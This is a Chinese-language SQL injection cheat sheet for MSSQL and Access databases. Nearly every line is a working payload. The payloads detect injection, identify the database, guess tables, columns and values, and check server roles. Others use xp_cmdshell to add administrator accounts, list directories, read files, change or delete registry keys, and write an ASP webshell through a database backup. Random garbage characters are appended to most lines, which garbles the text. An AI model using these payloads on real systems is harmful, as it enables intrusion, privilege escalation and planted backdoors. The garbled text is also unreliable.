1.判断是否有注入;and 1=1 ;and 1=2 9$i`B>C~
2.初步判断是否是mssql ;and user>0 \[jItg,+
v$Z1Lh
3.注入参数是字符'and [查询条件] and ''=' cxdM!L; `
(5
hu
W7v
4.搜索时没过滤参数的'and [查询条件] and '%25'=' XPKcF I=
58,mu#yq6
5.判断数据库系统 ;zODp+4@Q
OwUbm0)h^V
;and (select count(*) from sysobjects)>0 mssql EG6fC4rfC
IgJC>;]u
;and (select count(*) from msysobjects)>0 access TXv#/@
!y.7"G*
3\ed4D
IuD<lMeJJ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 3.Kdz}
}X-ggO,
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 k9]n/
!}?]&[N=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 J$[Vm%56
Sa5 y7
9.(1)猜字段的ascii值(access) s5e}X:
i9tM]/SP
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 L zC~> Uj
Sq%R
(2)猜字段的ascii值(mssql) vD t?N9
jT',+
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 /8T{bJ5
jL&F7itP
10.测试权限结构(mssql) )&K%Me
Ns(F%zkm
@}:(t{>;e7
pz+#1=b]
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?*=Jq
tTal<4
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- `N+ P,
TzJN,]F!M
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- mMH0 o
!WXSrICX[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Re_.<_$
t|%ul6{gz
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- PH.v3
3K
=UN:IzT
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- f{0PLFj
3V]a "C
;and 1=(select IS_MEMBER('db_owner'));-- |>)mYLN!y
gC.T5,tn
GU`2I/R
KV2X[1
11.添加mssql和系统的帐户 w'C(? ?mH
FU zY&@Y
;exec master.dbo.sp_addlogin username;-- gC_U7a w
;exec master.dbo.sp_password null,username,password;-- LJ?7W,?
h.NA$E?7
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Sj\8$QIXC
'4EJ_Vhztc
;exec master.dbo.xp_cmdshell 'net user username password Rd/!CJ@g
lCXo+|$?s
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
Ox RzKT
2\n6XAQ*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- FsjblB3?E
&>SE9w/?o
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- r.[k D"l
.vg;K@{
,b{4GU$3
udMq>s;
12.(1)遍历目录 3f0RMk$pH
~9=g" v
;create table dirs(paths varchar(100), id int) V.qB3V$
oT
OMqR{"
;insert dirs exec master.dbo.xp_dirtree 'c:\' %0 S0"t
'tekne
;and (select top 1 paths from dirs)>0 8I%1
`V
>
ewcD{bt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ? T9-FGW
o/&Q^^Xj^~
G"]'`2.m
*=rl<?tX
(2)遍历目录 @L0.Z1 ).
mSs%g L]g
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ^+88z>
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +m_quQ/ys
$|AxQQ%f
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 eG.?s;J0
pV_2JXM~@
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *5^h>Vk/
bTJ7RqL
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;TYkJH"
nL9m{$Zv
k2~j:&p
-O\`G<s%
13.mssql中的存储过程 yfj<P/aA+
u7K0m!
jW
xp_regenumvalues 注册表根键, 子键 Lq:Z='Kc
]`%cTdpLj
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 C
7v
8
:7'anj
xp_regread 根键,子键,键值名 \O[Cae:^?
n,`&f~tap
;exec xp_regread `3~w#?+=*
|2Q;SaI^\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 uTQ/_$
O:4.xe
xp_regwrite 根键,子键, 值名, 值类型, 值 opKtSF|)
@AJt/wPk
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 {B34^H:
]O^!P,l)"
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Vx'_fb?wap
C+_ NG
xp_regdeletevalue 根键,子键,值名 _("{fJ,A
o`G@Je_}x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 *x$\5;A
ws@;2?%A
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "!2Fy-Y
\\_Qv
$%LjIeVA5
X=lOwPvP
14.mssql的backup创建webshell |VIBSty2d
mhL,:UE
use model )tB mSVprl
R4{2+q=0
create table cmd(str image); )]'?yS"
E1=]m
insert into cmd(str) values (''); Lf3:' n
cJ&%XN
backup database model to disk='c:\l.asp'; :WE(1!P@
QHOem=B
C;_10Rb2ut
-rUn4a
15.mssql内置函数 7tJPjp4l
^J?I-LG
;and (select @@version)>0 获得Windows的版本号 !9B)/Xi
`zF=h#i
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k \|Hd"T
~)ls.NXI
;and (select user_name())>0 爆当前系统的连接用户 Pn0V{SJOJ%
5TqX;=B
;and (select db_name())>0 得到当前连接的数据库 ~nw]q<7r
/_v@YB!0
D3$}S{Yw1
El,p}Bi.
16.简洁的webshell M(xd:Fa?
;a2TONW
use model 42mdak}\
{2A/ @$?
create table cmd(str image); z>~Hc8*]3
?Yxk1Y4ig)
insert into cmd(str) values (''); jT%k{"+>+?
\f.ceh;!
backup database model to disk='g:\wwwtest\l.asp';